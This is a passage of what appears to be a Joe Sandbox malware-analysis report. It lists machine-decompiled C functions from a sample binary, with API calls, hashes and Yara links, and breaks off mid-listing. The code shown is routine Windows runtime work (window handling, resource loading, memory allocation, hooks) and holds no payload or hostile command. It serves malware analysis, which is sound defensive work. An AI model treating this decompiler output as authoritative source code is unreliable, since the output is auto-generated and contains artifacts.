                                                                                                                                                                                                                            • Instruction ID: 3bce9edae1ef54d3e8e9fd7389a7dc52dea682d655a911964018c4ee56d4c8a4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2b57222de1b4dc2aa53542cd692cdd0052a20a2f8b05dd666ba465e97723cdf0
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AC0108B0A046046FE702AB62CD129BF77ADEBC5724B21857BF804A26D1DB3C5D01C55D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00459634 Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00459634(void* __eax, void* __ecx, char __edx) {
				char _v12;
				struct HWND__* _v20;
				int _t17;
				void* _t27;
				struct HWND__* _t33;
				void* _t35;
				void* _t36;
				long _t37;

				_t37 = _t36 + 0xfffffff8;
				_t27 = __eax;
				_t17 =  *0x49ebb8; // 0x0
				if( *((intOrPtr*)(_t17 + 0x30)) != 0) {
					if( *((intOrPtr*)(__eax + 0x94)) == 0) {
						 *_t37 =  *((intOrPtr*)(__eax + 0x30));
						_v12 = __edx;
						EnumWindows(E004595C4, _t37);
						_t5 = _t27 + 0x90; // 0x0
						_t17 =  *_t5;
						if( *((intOrPtr*)(_t17 + 8)) != 0) {
							_t33 = GetWindow(_v20, 3);
							_v20 = _t33;
							if((GetWindowLongA(_t33, 0xffffffec) & 0x00000008) != 0) {
								_v20 = 0xfffffffe;
							}
							_t10 = _t27 + 0x90; // 0x0
							_t17 =  *_t10;
							_t35 =  *((intOrPtr*)(_t17 + 8)) - 1;
							if(_t35 >= 0) {
								do {
									_t13 = _t27 + 0x90; // 0x0
									_t17 = SetWindowPos(E0041AC6C( *_t13, _t35), _v20, 0, 0, 0, 0, 0x213);
									_t35 = _t35 - 1;
								} while (_t35 != 0xffffffff);
							}
						}
					}
					 *((intOrPtr*)(_t27 + 0x94)) =  *((intOrPtr*)(_t27 + 0x94)) + 1;
				}
				return _t17;
			}











                                                                                                                                                                                                                            0x00459636
                                                                                                                                                                                                                            0x00459639
                                                                                                                                                                                                                            0x0045963b
                                                                                                                                                                                                                            0x00459644
                                                                                                                                                                                                                            0x00459651
                                                                                                                                                                                                                            0x0045965a
                                                                                                                                                                                                                            0x0045965d
                                                                                                                                                                                                                            0x00459669
                                                                                                                                                                                                                            0x0045966e
                                                                                                                                                                                                                            0x0045966e
                                                                                                                                                                                                                            0x00459678
                                                                                                                                                                                                                            0x00459686
                                                                                                                                                                                                                            0x00459688
                                                                                                                                                                                                                            0x00459695
                                                                                                                                                                                                                            0x00459697
                                                                                                                                                                                                                            0x00459697
                                                                                                                                                                                                                            0x0045969e
                                                                                                                                                                                                                            0x0045969e
                                                                                                                                                                                                                            0x004596a7
                                                                                                                                                                                                                            0x004596ab
                                                                                                                                                                                                                            0x004596ad
                                                                                                                                                                                                                            0x004596c1
                                                                                                                                                                                                                            0x004596cd
                                                                                                                                                                                                                            0x004596d2
                                                                                                                                                                                                                            0x004596d3
                                                                                                                                                                                                                            0x004596ad
                                                                                                                                                                                                                            0x004596ab
                                                                                                                                                                                                                            0x00459678
                                                                                                                                                                                                                            0x004596d8
                                                                                                                                                                                                                            0x004596d8
                                                                                                                                                                                                                            0x004596e2

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • EnumWindows.USER32(004595C4), ref: 00459669
                                                                                                                                                                                                                            • GetWindow.USER32(00000003,00000003), ref: 00459681
                                                                                                                                                                                                                            • GetWindowLongA.USER32 ref: 0045968E
                                                                                                                                                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000213,00000000,000000EC), ref: 004596CD
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Window$EnumLongWindows
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 4191631535-0
                                                                                                                                                                                                                            • Opcode ID: c1819d15f6b1152034b058a47bfdea8cc9a2f81b5cb0d7028b19d9998be7cabc
                                                                                                                                                                                                                            • Instruction ID: e023c87b117193a46b59b10cd2d90065ddfa048c4e1cca94785ca85305bb7b15
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c1819d15f6b1152034b058a47bfdea8cc9a2f81b5cb0d7028b19d9998be7cabc
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 49117331609210AFD711EB28CC85F9673D4AB05765F18017AFDA8AF2D3C378AC49C75A
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0041E198 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                                                                                            			E0041E198(void* __eax, struct HINSTANCE__* __edx, CHAR* _a4) {
				CHAR* _v8;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t18;
				void* _t23;
				CHAR* _t24;
				void* _t25;
				struct HRSRC__* _t29;
				void* _t30;
				struct HINSTANCE__* _t31;
				void* _t32;

				_v8 = _t24;
				_t31 = __edx;
				_t23 = __eax;
				_t29 = FindResourceA(__edx, _v8, _a4);
				 *(_t23 + 0x10) = _t29;
				_t33 = _t29;
				if(_t29 == 0) {
					E0041E128(_t23, _t24, _t29, _t31, _t33, _t32);
					_pop(_t24);
				}
				_t5 = _t23 + 0x10; // 0x41e23c
				_t30 = LoadResource(_t31,  *_t5);
				 *(_t23 + 0x14) = _t30;
				_t34 = _t30;
				if(_t30 == 0) {
					E0041E128(_t23, _t24, _t30, _t31, _t34, _t32);
				}
				_t7 = _t23 + 0x10; // 0x41e23c
				_push(SizeofResource(_t31,  *_t7));
				_t8 = _t23 + 0x14; // 0x41dd60
				_t18 = LockResource( *_t8);
				_pop(_t25);
				return E0041DD20(_t23, _t25, _t18);
			}

















                                                                                                                                                                                                                            0x0041e19f
                                                                                                                                                                                                                            0x0041e1a2
                                                                                                                                                                                                                            0x0041e1a4
                                                                                                                                                                                                                            0x0041e1b4
                                                                                                                                                                                                                            0x0041e1b6
                                                                                                                                                                                                                            0x0041e1b9
                                                                                                                                                                                                                            0x0041e1bb
                                                                                                                                                                                                                            0x0041e1be
                                                                                                                                                                                                                            0x0041e1c3
                                                                                                                                                                                                                            0x0041e1c3
                                                                                                                                                                                                                            0x0041e1c4
                                                                                                                                                                                                                            0x0041e1ce
                                                                                                                                                                                                                            0x0041e1d0
                                                                                                                                                                                                                            0x0041e1d3
                                                                                                                                                                                                                            0x0041e1d5
                                                                                                                                                                                                                            0x0041e1d8
                                                                                                                                                                                                                            0x0041e1dd
                                                                                                                                                                                                                            0x0041e1de
                                                                                                                                                                                                                            0x0041e1e8
                                                                                                                                                                                                                            0x0041e1e9
                                                                                                                                                                                                                            0x0041e1ed
                                                                                                                                                                                                                            0x0041e1f6
                                                                                                                                                                                                                            0x0041e201

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • FindResourceA.KERNEL32(?,?,?), ref: 0041E1AF
                                                                                                                                                                                                                            • LoadResource.KERNEL32(?,0041E23C,?,?,?,00419048,?,00000001,00000000,?,0041E108,?), ref: 0041E1C9
                                                                                                                                                                                                                            • SizeofResource.KERNEL32(?,0041E23C,?,0041E23C,?,?,?,00419048,?,00000001,00000000,?,0041E108,?), ref: 0041E1E3
                                                                                                                                                                                                                            • LockResource.KERNEL32(0041DD60,00000000,?,0041E23C,?,0041E23C,?,?,?,00419048,?,00000001,00000000,?,0041E108,?), ref: 0041E1ED
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3473537107-0
                                                                                                                                                                                                                            • Opcode ID: 204fcfa686f8c971b2388dca130c5f5f1713674b05011f6669d9b69ced5a0bbe
                                                                                                                                                                                                                            • Instruction ID: 0493972d3240682b7dd301822f78e45fd4f377a97d2dc7c1e7558ac95a832863
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 204fcfa686f8c971b2388dca130c5f5f1713674b05011f6669d9b69ced5a0bbe
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ECF04BB6A042047F9704EE5AAC81DAB77DCEE88364320006EFD08DB342DA38ED4143B9
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00401618 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 45memoryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00401618(void* __eax, void** __ecx, void* __edx) {
				void* _t4;
				void** _t9;
				void* _t13;
				void* _t14;
				long _t16;
				void* _t17;

				_t9 = __ecx;
				_t14 = __edx;
				_t17 = __eax;
				 *(__ecx + 4) = 0x100000;
				_t4 = VirtualAlloc(__eax, 0x100000, 0x2000, 4);
				_t13 = _t4;
				 *_t9 = _t13;
				if(_t13 == 0) {
					_t16 = _t14 + 0x0000ffff & 0xffff0000;
					_t9[1] = _t16;
					_t4 = VirtualAlloc(_t17, _t16, 0x2000, 4);
					 *_t9 = _t4;
				}
				if( *_t9 != 0) {
					_t4 = E00401468(0x49e5ec, _t9);
					if(_t4 == 0) {
						VirtualFree( *_t9, 0, 0x8000);
						 *_t9 = 0;
						return 0;
					}
				}
				return _t4;
			}









                                                                                                                                                                                                                            0x0040161c
                                                                                                                                                                                                                            0x0040161e
                                                                                                                                                                                                                            0x00401620
                                                                                                                                                                                                                            0x00401622
                                                                                                                                                                                                                            0x00401636
                                                                                                                                                                                                                            0x0040163b
                                                                                                                                                                                                                            0x0040163d
                                                                                                                                                                                                                            0x00401641
                                                                                                                                                                                                                            0x00401649
                                                                                                                                                                                                                            0x0040164f
                                                                                                                                                                                                                            0x0040165b
                                                                                                                                                                                                                            0x00401660
                                                                                                                                                                                                                            0x00401660
                                                                                                                                                                                                                            0x00401665
                                                                                                                                                                                                                            0x0040166e
                                                                                                                                                                                                                            0x00401675
                                                                                                                                                                                                                            0x00401681
                                                                                                                                                                                                                            0x00401688
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00401688
                                                                                                                                                                                                                            0x00401675
                                                                                                                                                                                                                            0x0040168e

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(?,00100000,00002000,00000004,0049E5FC,?,?,?,00401984), ref: 00401636
                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,00100000,00002000,00000004,0049E5FC,?,?,?,00401984), ref: 0040165B
                                                                                                                                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00100000,00002000,00000004,0049E5FC,?,?,?,00401984), ref: 00401681
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Virtual$Alloc$Free
                                                                                                                                                                                                                            • String ID: I
                                                                                                                                                                                                                            • API String ID: 3668210933-1966777607
                                                                                                                                                                                                                            • Opcode ID: 9242c8f04ba6a953fed65f5a94bc479e276dd12d602b6f7bb6bff271b5ad87a5
                                                                                                                                                                                                                            • Instruction ID: d5b131199f8cf9b3caee1c5a15836c0652bc1ac5bd3422d56553b580ad17c722
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9242c8f04ba6a953fed65f5a94bc479e276dd12d602b6f7bb6bff271b5ad87a5
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6DF044B17403206BEB315AAA4CC5F133AD89B45794F154176BE08BF3D9D6B99800866C
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00409AB8 Relevance: 6.0, APIs: 4, Instructions: 39timefileCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00409AB8(WORD* __eax) {
				struct _FILETIME _v12;
				long _t20;
				WORD* _t30;
				void* _t35;
				struct _FILETIME* _t36;

				_t36 = _t35 + 0xfffffff8;
				_t30 = __eax;
				while((_t30[0xc].dwFileAttributes & _t30[8]) != 0) {
					if(FindNextFileA(_t30[0xa],  &(_t30[0xc])) != 0) {
						continue;
					} else {
						_t20 = GetLastError();
					}
					L5:
					return _t20;
				}
				FileTimeToLocalFileTime( &(_t30[0x16]), _t36);
				FileTimeToDosDateTime( &_v12,  &(_t30[1]), _t30);
				_t30[2] = _t30[0x1c];
				_t30[4] = _t30[0xc].dwFileAttributes;
				E00404C30( &(_t30[6]), 0x104,  &(_t30[0x22]));
				_t20 = 0;
				goto L5;
			}








                                                                                                                                                                                                                            0x00409ab9
                                                                                                                                                                                                                            0x00409abc
                                                                                                                                                                                                                            0x00409ad8
                                                                                                                                                                                                                            0x00409acf
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00409ad1
                                                                                                                                                                                                                            0x00409ad1
                                                                                                                                                                                                                            0x00409ad1
                                                                                                                                                                                                                            0x00409b17
                                                                                                                                                                                                                            0x00409b1a
                                                                                                                                                                                                                            0x00409b1a
                                                                                                                                                                                                                            0x00409ae5
                                                                                                                                                                                                                            0x00409af4
                                                                                                                                                                                                                            0x00409afc
                                                                                                                                                                                                                            0x00409b02
                                                                                                                                                                                                                            0x00409b10
                                                                                                                                                                                                                            0x00409b15
                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • FindNextFileA.KERNEL32(?,?), ref: 00409AC8
                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?), ref: 00409AD1
                                                                                                                                                                                                                            • FileTimeToLocalFileTime.KERNEL32(?), ref: 00409AE5
                                                                                                                                                                                                                            • FileTimeToDosDateTime.KERNEL32 ref: 00409AF4
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FileTime$DateErrorFindLastLocalNext
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2103556486-0
                                                                                                                                                                                                                            • Opcode ID: a849e5e94c7fbfa8f8aea85ae301e7413f9f23e8f459ad811eccfcc8423f03f6
                                                                                                                                                                                                                            • Instruction ID: 4a410686d79e47fa2b0968ed75fbe7b0933b14da80f461b342b6a519e83f05d1
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a849e5e94c7fbfa8f8aea85ae301e7413f9f23e8f459ad811eccfcc8423f03f6
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AFF01DB26042019BCF04DFA9D8C288733ACAB4831431445B7AD16DF28BE638E9549BA9
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00438CE0 Relevance: 6.0, APIs: 4, Instructions: 37threadCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 87%
                                                                                                                                                                                                                            			E00438CE0(struct HWND__* __eax, void* __ecx) {
				intOrPtr _t9;
				signed int _t16;
				struct HWND__* _t19;
				DWORD* _t20;

				_t17 = __ecx;
				_push(__ecx);
				_t19 = __eax;
				_t16 = 0;
				if(__eax != 0 && GetWindowThreadProcessId(__eax, _t20) != 0 && GetCurrentProcessId() ==  *_t20) {
					_t9 =  *0x49eb28; // 0x0
					if(GlobalFindAtomA(E00404E80(_t9)) !=  *0x49eb24) {
						_t16 = 0 | E00437E28(_t19, _t17) != 0x00000000;
					} else {
						_t16 = 0 | GetPropA(_t19,  *0x49eb24 & 0x0000ffff) != 0x00000000;
					}
				}
				return _t16;
			}







                                                                                                                                                                                                                            0x00438ce0
                                                                                                                                                                                                                            0x00438ce2
                                                                                                                                                                                                                            0x00438ce3
                                                                                                                                                                                                                            0x00438ce5
                                                                                                                                                                                                                            0x00438ce9
                                                                                                                                                                                                                            0x00438d00
                                                                                                                                                                                                                            0x00438d17
                                                                                                                                                                                                                            0x00438d37
                                                                                                                                                                                                                            0x00438d19
                                                                                                                                                                                                                            0x00438d29
                                                                                                                                                                                                                            0x00438d29
                                                                                                                                                                                                                            0x00438d17
                                                                                                                                                                                                                            0x00438d3f

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 00438CED
                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32(00000000,?,?,-0000000C,00000000,00438D58,00438B1A,0049EB5C,00000000,0043890A,?,-0000000C,?), ref: 00438CF6
                                                                                                                                                                                                                            • GlobalFindAtomA.KERNEL32(00000000), ref: 00438D0B
                                                                                                                                                                                                                            • GetPropA.USER32 ref: 00438D22
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Process$AtomCurrentFindGlobalPropThreadWindow
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2582817389-0
                                                                                                                                                                                                                            • Opcode ID: 0bffcbc514aafa585d093ff078779f4e4c909c3ec109cfbb288702f9224ab6dc
                                                                                                                                                                                                                            • Instruction ID: e92755073dd59f3c21f23970beea19c54b642f04f63fe31ed46c29e0623daff0
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0bffcbc514aafa585d093ff078779f4e4c909c3ec109cfbb288702f9224ab6dc
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 17F02761B06722539621B3775D8196F518C9E383A8B10453FF840D23C1CA2CFC42C17F
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00437E5C Relevance: 6.0, APIs: 4, Instructions: 35threadCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 87%
                                                                                                                                                                                                                            			E00437E5C(struct HWND__* __eax, void* __ecx) {
				intOrPtr _t5;
				struct HWND__* _t12;
				void* _t15;
				DWORD* _t16;

				_t13 = __ecx;
				_push(__ecx);
				_t12 = __eax;
				_t15 = 0;
				if(__eax != 0 && GetWindowThreadProcessId(__eax, _t16) != 0 && GetCurrentProcessId() ==  *_t16) {
					_t5 =  *0x49eb2c; // 0x0
					if(GlobalFindAtomA(E00404E80(_t5)) !=  *0x49eb26) {
						_t15 = E00437E28(_t12, _t13);
					} else {
						_t15 = GetPropA(_t12,  *0x49eb26 & 0x0000ffff);
					}
				}
				return _t15;
			}







                                                                                                                                                                                                                            0x00437e5c
                                                                                                                                                                                                                            0x00437e5e
                                                                                                                                                                                                                            0x00437e5f
                                                                                                                                                                                                                            0x00437e61
                                                                                                                                                                                                                            0x00437e65
                                                                                                                                                                                                                            0x00437e7c
                                                                                                                                                                                                                            0x00437e93
                                                                                                                                                                                                                            0x00437eae
                                                                                                                                                                                                                            0x00437e95
                                                                                                                                                                                                                            0x00437ea3
                                                                                                                                                                                                                            0x00437ea3
                                                                                                                                                                                                                            0x00437e93
                                                                                                                                                                                                                            0x00437eb5

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 00437E69
                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32(?,?,00000000,0045A3E7,?,?,0049ABD1,00000001,0045A553,?,?,?,0049ABD1), ref: 00437E72
                                                                                                                                                                                                                            • GlobalFindAtomA.KERNEL32(00000000), ref: 00437E87
                                                                                                                                                                                                                            • GetPropA.USER32 ref: 00437E9E
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Process$AtomCurrentFindGlobalPropThreadWindow
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2582817389-0
                                                                                                                                                                                                                            • Opcode ID: 12e1309046830def7c7591e3640ab464f98edbea615ae7cca6562d9d5199258a
                                                                                                                                                                                                                            • Instruction ID: 314671358fdb4042d771ff6fe008545e316f8929ccac966e84d460348b4874f5
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 12e1309046830def7c7591e3640ab464f98edbea615ae7cca6562d9d5199258a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CCF037E2A0C22556D630F7B75C8292B259D8A1C3A6700557BF981E7346D53CFC00C2BE
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00458F44 Relevance: 6.0, APIs: 4, Instructions: 34threadCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00458F44(void* __ecx) {
				void* _t2;
				DWORD* _t7;

				_t2 =  *0x49ebb8; // 0x0
				if( *((char*)(_t2 + 0xa5)) == 0) {
					if( *0x49ebd0 == 0) {
						_t2 = SetWindowsHookExA(3, E00458F00, 0, GetCurrentThreadId());
						 *0x49ebd0 = _t2;
					}
					if( *0x49ebcc == 0) {
						_t2 = CreateEventA(0, 0, 0, 0);
						 *0x49ebcc = _t2;
					}
					if( *0x49ebd4 == 0) {
						_t2 = CreateThread(0, 0x3e8, E00458EA4, 0, 0, _t7);
						 *0x49ebd4 = _t2;
					}
				}
				return _t2;
			}





                                                                                                                                                                                                                            0x00458f45
                                                                                                                                                                                                                            0x00458f51
                                                                                                                                                                                                                            0x00458f5a
                                                                                                                                                                                                                            0x00458f6c
                                                                                                                                                                                                                            0x00458f71
                                                                                                                                                                                                                            0x00458f71
                                                                                                                                                                                                                            0x00458f7d
                                                                                                                                                                                                                            0x00458f87
                                                                                                                                                                                                                            0x00458f8c
                                                                                                                                                                                                                            0x00458f8c
                                                                                                                                                                                                                            0x00458f98
                                                                                                                                                                                                                            0x00458fab
                                                                                                                                                                                                                            0x00458fb0
                                                                                                                                                                                                                            0x00458fb0
                                                                                                                                                                                                                            0x00458f98
                                                                                                                                                                                                                            0x00458fb6

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00458F5C
                                                                                                                                                                                                                            • SetWindowsHookExA.USER32 ref: 00458F6C
                                                                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00458F87
                                                                                                                                                                                                                            • CreateThread.KERNEL32 ref: 00458FAB
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CreateThread$CurrentEventHookWindows
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1195359707-0
                                                                                                                                                                                                                            • Opcode ID: 384df75440d72ed728e41f43c57573df01cdbccf644e11b6f14e86c86d3cdf40
                                                                                                                                                                                                                            • Instruction ID: 57ffb722b27d6620bd0413708f68fc30d075597d86d482f7219fb2c4a52a2897
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 384df75440d72ed728e41f43c57573df01cdbccf644e11b6f14e86c86d3cdf40
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 60F0D0B1A88301AEF710E7269C06F163655A724B1BF10413FF606791D2CFBC64888B1D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00460AA0 Relevance: 6.0, APIs: 4, Instructions: 24COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 48%
                                                                                                                                                                                                                            			E00460AA0(signed int __eax) {
				signed int _t1;
				signed int _t2;

				_t1 = __eax;
				_push(0);
				L00407638();
				_t2 = __eax;
				_push(0xc);
				_push(__eax);
				L00407380();
				_push(0xe);
				_push(__eax);
				L00407380();
				if(__eax * __eax > 8) {
					 *0x49c08f = 0;
				} else {
					 *0x49c08f = 1;
				}
				_push(_t2);
				_push(0);
				L00407888();
				return _t1;
			}





                                                                                                                                                                                                                            0x00460aa0
                                                                                                                                                                                                                            0x00460aa2
                                                                                                                                                                                                                            0x00460aa4
                                                                                                                                                                                                                            0x00460aa9
                                                                                                                                                                                                                            0x00460aab
                                                                                                                                                                                                                            0x00460aad
                                                                                                                                                                                                                            0x00460aae
                                                                                                                                                                                                                            0x00460ab5
                                                                                                                                                                                                                            0x00460ab7
                                                                                                                                                                                                                            0x00460ab8
                                                                                                                                                                                                                            0x00460ac3
